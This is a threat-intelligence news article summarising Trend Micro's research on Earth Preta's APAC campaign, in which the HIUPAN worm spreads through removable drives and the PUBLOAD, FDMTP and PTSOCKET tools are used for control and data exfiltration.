The threat group known as Earth Preta has escalated its attacks by utilizing malware distributed through removable drives, using a variant of the worm HIUPAN. This sophisticated campaign targets specific countries and sectors in the Asia-Pacific region, employing a combination of tools and techniques to swiftly deploy malware and extract data.
According to researchers at Trend Micro, the HIUPAN worm plays a crucial role in Earth Preta’s attack chain, enabling the group to spread PUBLOAD through removable drives into the networks of their targets. The configuration file of HIUPAN contains vital information for its propagation and watchdog function, simplifying the setup and execution process. Once activated, HIUPAN installs a copy of itself on the victim’s system, creates an autorun registry entry for persistence, and modifies registry values to conceal its presence.
PUBLOAD, the primary control tool utilized by Earth Preta, conducts tasks such as gathering system information, mapping the network, and aiding in the delivery of additional tools like FDMTP and PTSOCKET. FDMTP, a newly identified hacking tool, is responsible for downloading and executing malware, while PTSOCKET functions as an exfiltration tool to transfer collected data to a remote server.
Previously, Earth Preta relied on spear-phishing emails to distribute PUBLOAD, but the shift to using removable drives for HIUPAN malware distribution allows them to target a broader range of victims and bypass certain security measures effectively. The countries suspected to be targeted in this campaign include Myanmar, the Philippines, Vietnam, Singapore, Cambodia, and Taiwan, all situated in the APAC region. Moreover, the decoy documents employed in these attacks predominantly center around government-related topics, particularly foreign affairs.
The HIUPAN worm variant utilized by Earth Preta in these attacks is easily configurable, with an external config file containing information for its propagation and watchdog function. The watcher function of HIUPAN periodically scans for removable and hot-pluggable drives and propagates to them if detected, ensuring the continuous spread of the malware.
PUBLOAD utilizes WinRAR to collect data from targeted files, encrypts and uploads the archived files to an attacker-controlled FTP site using cURL. Alternatively, PTSOCKET facilitates exfiltration and file transfer to attackers in multi-thread mode. Earth Preta’s data collection and exfiltration operations are designed to be swift and discreet, underscoring the importance for security teams to stay updated on these evolving tactics.
Earth Preta has exhibited significant advancements in malware deployment and attack strategies, especially in campaigns targeting government entities in the APAC region. The utilization of tools like FDMTP and PTSOCKET greatly enhances Earth Preta’s control and exfiltration capabilities, with previous campaigns showcasing the use of multi-stage downloaders and exploitation of cloud services for data exfiltration.
The rapid turnover of decoy documents and malware samples on Earth Preta’s WebDAV server indicates highly targeted and time-sensitive operations, with a focus on specific countries and industries within the APAC region. Researchers anticipate that the group will continue to be active in these regions, posing a persistent threat to cybersecurity.